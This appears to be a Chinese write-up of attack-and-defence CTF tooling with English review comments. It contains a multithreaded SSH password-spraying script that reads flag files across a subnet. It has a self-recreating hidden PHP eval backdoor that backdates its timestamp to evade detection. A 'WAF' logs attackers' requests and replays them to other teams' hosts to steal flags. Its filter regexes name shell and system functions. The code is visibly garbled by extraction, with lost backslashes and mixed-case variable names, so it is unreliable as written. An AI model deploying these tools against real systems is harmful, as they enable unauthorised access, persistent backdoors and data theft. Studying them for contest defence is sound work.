#!/usr/bin/python
# -*- coding: utf-8 -*-
# author: 追寻_smile
import paramiko
import threading
def ssh(port: str | int, ip: str, username: str, passwd: str, cmd: list[str]) -> None:
    """Password-authenticate to one host over SSH and run each entry of *cmd*.

    Every stdout line of every command is printed prefixed with ``ip``.
    A failure of any kind is caught by the bare ``except`` below and
    reported as a failed connection; nothing is returned.

    Args:
        port: SSH port; the ``__main__`` block passes it as the string ``'22'``.
        ip: host address to connect to.
        username: login name used for password authentication.
        passwd: password used for password authentication.
        cmd: list of command strings, executed one after another.
    """
    try:
        # create the paramiko client
        ssh = paramiko.SSHClient()
        # set_missing_host_key_policy: policy used when the server's host key is
        # neither in the system host keys nor in the application's own keys.
        # AutoaddPolicy(): add the hostname and the new host key to the local
        # HostKeys object and save it, i.e. an unknown host key is accepted
        # rather than rejected.
        ssh.set_missing_host_key_policy(paramiko.AutoaddPolicy())
        # connect to the SSH server and authenticate; port defaults to 22
        ssh.connect(ip, port, username, passwd, timeout=1)
        # iterate over the commands to run
        for i in cmd:
            """
            exec_command(command, bufsize=-1, timeout=None, get_pty=false, environment=NonE)
            命令的输入和输出流以类似于Python file的对象的形式返回,它们代表stdin,stdout和stderr。
            """
            stdin, stdout, stderr = ssh.exec_command(i)
            # read what the command printed on stdout (stderr is never read)
            #print(stdout.read())
            out = stdout.readlines()
            for m in out:
                print(ip+':'+m)
        # NOTE(review): "%st" and the trailing "n" look like "\t" / "\n" with the
        # backslashes lost in extraction; the literal is kept as found.
        print('%s:%st连接成功n' % (ip, port))
        #stdin, stdout, stderr = ssh.exec_command(cmd)
        # print the command output
        #result = stdout.read()
        #res = result.decode(encoding="utf-8")
        #print(res)
        # closed only on the success path; on an exception the client is not closed here
        ssh.close()
    except:
        # bare except: network errors, authentication failures and any bug inside
        # the try block all land here and are reported the same way
        print('%s:%st连接失败n' % (ip, port))
if __name__ == '__main__':
    # commands to run on every host
    cmd = ['cat flag*']
    # user name
    username = "admin"
    # password
    passwd = '123456'
    # thread list; NOTE(review): nothing is ever appended to it, and the threads
    # started below are never joined
    threads = []
    print('begin....')
    # port list (strings; passed through to ssh() unchanged)
    ports = ['22']
    # adjust this loop to your needs
    for port in ports:
        # one thread per address 172.16.2.1 .. 172.16.2.50, all started at once;
        # from the receiving side this is a burst of password-auth attempts from
        # one source across the /24, which SSH auth logs record per host
        for j in range(1,51):
            ip = '172.16.2.%d' % j
            # thread: target function (arguments)
            a = threading.Thread(target=ssh, args=(port, ip, username, passwd, cmd))
            a.start()
<?php
// NOTE(review): this is the "undying webshell" (不死马) loader the article
// discusses. The comments describe what each line does so that the
// indicators are clear to whoever has to find and remove it.
ignore_user_abort(true);   // keep running after the HTTP client disconnects
set_time_limit(0);         // no execution-time limit: the loop below never ends
unlink(__FILE__);          // delete the loader itself; only the running PHP process remains
$file = '.zx.php';         // dot-prefixed name, so a plain directory listing does not show it
// Payload rewritten on every iteration: an eval() of POST data gated on the md5 of a GET parameter.
$code = '<?php if(md5($_GET["keliseng"])=="c4704ba67d00af3d3ff4318343d1529b"){@eval($_POST[zx]);} ?>';
while (1){
    // NOTE(review): "$codE" vs "$code" looks like extraction mangling; PHP variables are case-sensitive
    file_put_contents($file,$codE);
    // reset the modification time to a fixed past date so mtime-based searches (find -mmin) miss it;
    // touch -m does not set ctime, which a rewrite updates, so a ctime-based search (find -cmin) still sees the file
    system('touch -m -d "2018-12-01 09:10:12" .zx.php');
    usleep(5000);   // 5 ms: the file is recreated ~200 times per second, so deleting it without killing the process is futile
}
?>
1. .zx.php以.开头可以起到隐藏作用 2."2018-12-01 09:10:12"可以隐藏创建时间,防御者通过find *.php -mmin -10 (找到10分钟内修改的php文件)找不到此文件。 3.md5加密保证不死马只为自己所用。
如果主办方没有明令禁止,可以上通防WAF,对于很多典型的漏洞都可以起到作用.
<?php
/**CTF—**/
error_reporTing(0); // silence all PHP diagnostics, including failures of the WAF's own file and HTTP operations below
class CTF_WAF{
    // NOTE(review): as reproduced on this page the listing has lost characters in places
    // (backslashes before embedded quotes and in "\r\n"/"\t", and the letter case of some
    // variables such as $style/$stylE, $file/$filE, $Value/$value). PHP variables are
    // case-sensitive, so the code will not run verbatim; the comments below describe the
    // data flow as far as the visible code shows it.
    public $getfilter;     // regex alternation applied to GET values
    public $postfilter;    // regex alternation applied to POST values
    public $cookiefilter;  // regex alternation applied to cookie values
    public $orther;        // additional alternation applied to every request kind
    public $url;           // URL of the current request, rebuilt from $_SERVER
    public $dir;           // log directory: <DOCUMENT_ROOT>/waflog/
    public $ip;            // hosts read from waflog/ip.txt, one per line
    public $Waf_switch;    // 1 = check_Flux() blocks matches, 0 = log/forward only
    public $resultPage;    // URL whose body is sent to a blocked client
    /**
     * Builds the filter lists, derives the log directory and loads ip.txt.
     *
     * NOTE(review): $dir sits inside DOCUMENT_ROOT, so logs.txt / flag.txt / ip.txt
     * (which hold raw request values) are reachable over HTTP unless the web server
     * denies access to that path.
     */
    public function __construct() {
        // GET filter rules
        $this->getfilter = "\<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|srC)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmarks*?(.*)|sleeps*?(.*)|\b(group_)?concat[\s\/\*]*?\([^\)]+?\)|bcase[s/*]*?when[s/*]*?([^)]+?)|load_files*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})s*?=|^\+\/v(8|9)|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|s+?[\w]+?\s+?\bin\b\s*?(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?@R_618_10288@CTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)|updatEs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|Delete)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|<.*(iframe|frame|style|embed|object|frameset|meta|xml|a|img)|hacker";
        // POST filter rules
        $this->postfilter = "<.*=(&#\d+?;?)+?>|<.*data=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmarks*?(.*)|sleeps*?(.*)|\b(group_)?concat[\s\/\*]*?\([^\)]+?\)|bcase[s/*]*?when[s/*]*?([^)]+?)|load_files*?\()|<[^>]*?\b(onerror|onmousemove|onload|onclick|onmouseover)\b|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|s+?[\w]+?\s+?\bin\b\s*?(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?@R_618_10288@CTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)|updatEs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|Delete)(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|<.*(iframe|frame|style|embed|object|frameset|meta|xml|a|img)|hacker";
        // cookie filter rules
        $this->cookiefilter = "benchmarks*?(.*)|sleeps*?(.*)|load_files*?\(|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|s+?[\w]+?\s+?\bin\b\s*?(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?@R_618_10288@CTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)|updatEs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|Delete)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
        // other filter rules
        // NOTE(review): the unescaped parentheses in entries like "eval(.*)" are regex groups,
        // not literal "(", so the bare word already matches. The alternation also contains a
        // bare "^" branch; with the "/is" flags used in check_Flux() a start-of-subject anchor
        // matches every input, so with $Waf_switch = 1 every request would be blocked — possibly
        // a "\" before "^" was lost in extraction.
        $this->orther ="eval(.*)|phpinfo()|assert(.*)|`|~|^|<?php|[oc]:d+:|pcntl_alarm|pcntl_fork|pcntl_waitpid|pcntl_wait|pcntl_wifexited|pcntl_wifstopped|pcntl_wifsignaled|pcntl_wifconTinued|pcntl_wexitstatus|pcntl_wtermsig|pcntl_wstopsig|pcntl_signal|pcntl_signal_get_handler|pcntl_signal_dispatch|pcntl_get_last_error|pcntl_strerror|pcntl_sigprOCMask|pcntl_sigwaiTinfo|pcntl_sigtimedwait|pcntl_exec|pcntl_getpriority|pcntl_setpriority|pcntl_async_signals|system(.*)|exec(.*)|sHell_exec(.*)|popen(.*)|proc_open(.*)|passthru(.*)|symlink(.*)|link(.*)|syslog(.*)|imap_open(.*)|flag|cats|etcspasswd|IFS|display_errors|catch|ini_set|set_time_limit(0)";
        // NOTE(review): $_SERVER keys are case-sensitive ('HTTP_HOST', 'REQUEST_URI',
        // 'DOCUMENT_ROOT'); the mixed-case spellings here look like extraction mangling.
        $this->url = 'http://'.$_SERVER['http_HOST'].$_SERVER['requEST_URI'];
        $this->dir = $_SERVER['DOCUMENT_ROOT'].'/'.'waflog/';
        $this->ip = [];
        $this->read_ip();
        $this->resultPage="http://127.0.0.1/";// page returned to a blocked client
        $this->Waf_switch=0;// WAF switch: 1 = on, 0 = off (off by default, so nothing is blocked)
    }
    /**
     * Per-request entry point for one source of values.
     *
     * Writes a log record to logs.txt via data_to_file() (whose 'post' and 'get'
     * branches also re-issue the request to every host in $ip), then runs the
     * style-specific filter and $orther through check_Flux().
     *
     * @param mixed  $Value  array of request values (flattened with http_build_query) or a string
     * @param string $stylE  'post', 'get', or anything else (treated as cookie)
     *
     * NOTE(review): the log record is assembled by string concatenation with no escaping
     * of $Value; a value containing a quote or a newline corrupts the JSON line that
     * data_to_file() later json_decode()s. The checks read $value while the parameter is
     * $Value — see the case note at the top of the class.
     */
    public function Flux($Value,$stylE){
        switch ($stylE) {
            case 'post':
                if(is_array($value)){
                    $Value = http_build_query($value);
                }
                $this->data_to_file("{"url":"".$this->url."","value":".""".$Value."","style":"Post","time":"".time().""}rn","logs.txt",'post');
                $this->check_Flux($Value, $this->postfilter);
                $this->check_Flux($Value, $this->orther);
                break;
            case 'get':
                if(is_array($value)){
                    $Value = http_build_query($value);
                }
                $this->data_to_file("{"url":"".$this->url."","value":".""".$Value."","style":"Get","time":"".time().""}rn","logs.txt",'get');
                $this->check_Flux($Value, $this->getfilter);
                $this->check_Flux($Value, $this->orther);
                break;
            default:
                if(is_array($value)){
                    $Value = http_build_query($value);
                }
                $this->data_to_file("{"url":"".$this->url."","value":".""".$Value."","style":"Cookie","time":"".time().""}rn","logs.txt",'cookie');
                $this->check_Flux($Value, $this->cookiefilter);
                $this->check_Flux($Value, $this->orther);
                break;
        }
    }
    /**
     * Loads $this->ip from waflog/ip.txt (created empty if missing), one host per line.
     *
     * NOTE(review): the feof()/fgets() loop pushes one extra element from the final
     * failed read (trim(false) is ""), so the list normally ends with an empty string,
     * which the replay loops then turn into a request to "http:///".
     */
    public function read_ip(){
        if(!file_exists($this->dir."ip.txt")){
            file_put_contents($this->dir."ip.txt", "");
        }
        $file = fopen($this->dir."ip.txt", "r") or exit("");
        while(!feof($filE))
        {
            array_push($this->ip, trim(fgets($filE)));
        }
        fclose($filE);
    }
    /**
     * Applies one regex alternation to the value (url-decoded once) and ends the
     * request when it matches. Does nothing unless $Waf_switch == 1.
     *
     * NOTE(review): blocking is done with die(file_get_contents($resultPage)), i.e. an
     * outbound HTTP fetch of the block page on every match, so a burst of blocked
     * requests also loads 127.0.0.1. The filter string is embedded in "/.../is"
     * unescaped, so any filter containing "/" would break the expression.
     */
    public function check_Flux($Value,$ArrFiltReq){
        if($this->Waf_switch==1){
            if(is_array($value)){
                $Value=implode($value);
            }
            $Value=urldecode($value);
            if (preg_match("/".$ArrFiltReq."/is",$value)==1){
                die(file_get_contents($this->resultPagE));
            }
        }
    }
    /**
     * Sends $data as a form-encoded POST to $url over plain HTTP (60 s timeout) and
     * returns the raw response body (false on failure). Requires allow_url_fopen.
     */
    public function request_Post($data,$url){
        if(is_array($data)){
            $query = http_build_query($data); // build a URL-encoded query string from the (associative or indexed) array
        }else{
            $query = $data;
        }
        $options['http'] = array(
            'timeout'=>60,
            'method' => 'POST',
            'header' => 'Content-type:application/x-www-form-urlencoded',
            'content' => $query
        );// build the POST request
        //vardump($options['http'] );_
        $context = stream_context_create($options);// create a stream context
        $result = file_get_contents($url, false, $context);
        return $result;
    }
    /**
     * Fetches $url with a GET and returns ['content' => body, 'ip' => host part of the URL].
     *
     * NOTE(review): the pattern '///(.*?)//' has "/" as delimiter with nothing escaped;
     * it looks like '/\/\/(.*?)\//' with the backslashes lost, and as written it is not
     * a valid expression.
     */
    public function request_Get($url){
        $result=[];
        $result['content'] = file_get_contents($url);
        preg_match_all('///(.*?)//', $url, $ip);
        $result['ip'] = $ip[1][0];
        return $result;
    }
    /**
     * Scans a response for the first flag{...} token and appends "<ip>\t| <flag>" to flag.txt.
     *
     * @param array $result as returned by request_Get()/request_Post() — 'content' and 'ip' keys
     */
    public function Get_Flag($result){
        //var_dump($result);
        if(Stristr($result['content'],'flag')){
            preg_match_all('/flag{(.*?)}/', $result['content'],$flag);
            if(!empty($flag[0][0])){
                $this->data_to_file("{$result['ip']}t| ".$flag[0][0]."rn","flag.txt",'flag');
            }
        }
    }
    /**
     * Appends $data to $dir.$filename unless an identical record is already in the file.
     *
     * For 'post' and 'get' the JSON record is decoded again and the request is re-issued
     * to every host in $ip (the host of the logged URL is swapped for each entry) and the
     * reply handed to Get_Flag(). 'cookie' and 'flag' only append.
     *
     * NOTE(review): de-duplication is stristr() against the whole log file, so every call
     * reads the complete file and the file grows without bound; the mixed-case
     * $fileName/$filename is probably extraction mangling.
     */
    public function data_to_file($data,$filename,$style=''){
        if(is_array($data)){
            $data = implode($data);
        }
        switch ($stylE) {
            case 'post':
                if(!Stristr(file_get_contents($this->dir.$fileName),$data)){
                    if(file_exists($this->dir.$fileName)){
                        file_put_contents($this->dir.$filename,"".$data,FILE_APPEND);
                    }else{
                        file_put_contents($this->dir.$filename,$data,FILE_APPEND);
                    }
                    // re-issue the logged POST body to each listed host
                    for($i=0;$i<count($this->ip);$i++){
                        $this->Get_Flag($this->request_Post(json_decode(str_replace("rn","",$data),truE)['value'],'http://'.$this->ip[$i].'/'));
                    }
                }
                break;
            case 'get':
                $js_data = $data;
                if(!Stristr(file_get_contents($this->dir.$fileName),str_replace('http://'.$_SERVER['http_HOST'], '', $data))){
                    file_put_contents($this->dir.$filename, $js_data ,FILE_APPEND);
                    // re-issue the logged URL against each listed host, then restore $data
                    for($i=0;$i<count($this->ip);$i++){
                        $data=str_replace($_SERVER['http_HOST'],$this->ip[$i],json_decode(str_replace("rn","",$data),truE)['url']);
                        $this->Get_Flag($this->request_Get($data));
                        $data=$js_data ;
                    }
                }
                break;
            case 'cookie':
                if(!Stristr(file_get_contents($this->dir.$fileName),$data)){
                    if(file_exists($this->dir.$fileName)){
                        file_put_contents($this->dir.$filename,"".$data,FILE_APPEND);
                    }else{
                        file_put_contents($this->dir.$filename,$data,FILE_APPEND);
                    }
                }
                break;
            case 'flag':
                if(!Stristr(file_get_contents($this->dir.$fileName),$data)){
                    file_put_contents($this->dir.$filename,$data,FILE_APPEND);
                }
                break;
        }
    }
}
/*******************************/
/* 调用WAF */
$waf = new CTF_WAF();
// NOTE(review): isset() on a superglobal array is always true, so all three calls run
// on every request. Blocking happens only with $Waf_switch = 1 (the constructor sets 0);
// the logging to waflog/ and the forwarding in data_to_file() run regardless.
if(isset($_GET)){
    $waf->Flux($_GET,'get');
}
if(isset($_POST)){
    $waf->Flux($_POST,'post');
}
if(isset($_COOKIE)){
    $waf->Flux($_COOKIE,'cookie');
}
查杀不死马
1.find *.php -mmin -10 #找到10分钟内修改的php文件,如果有的话删除
2.ps -aux 查看进程,kill 掉不死马,或者上传同名文件,不死马则失效。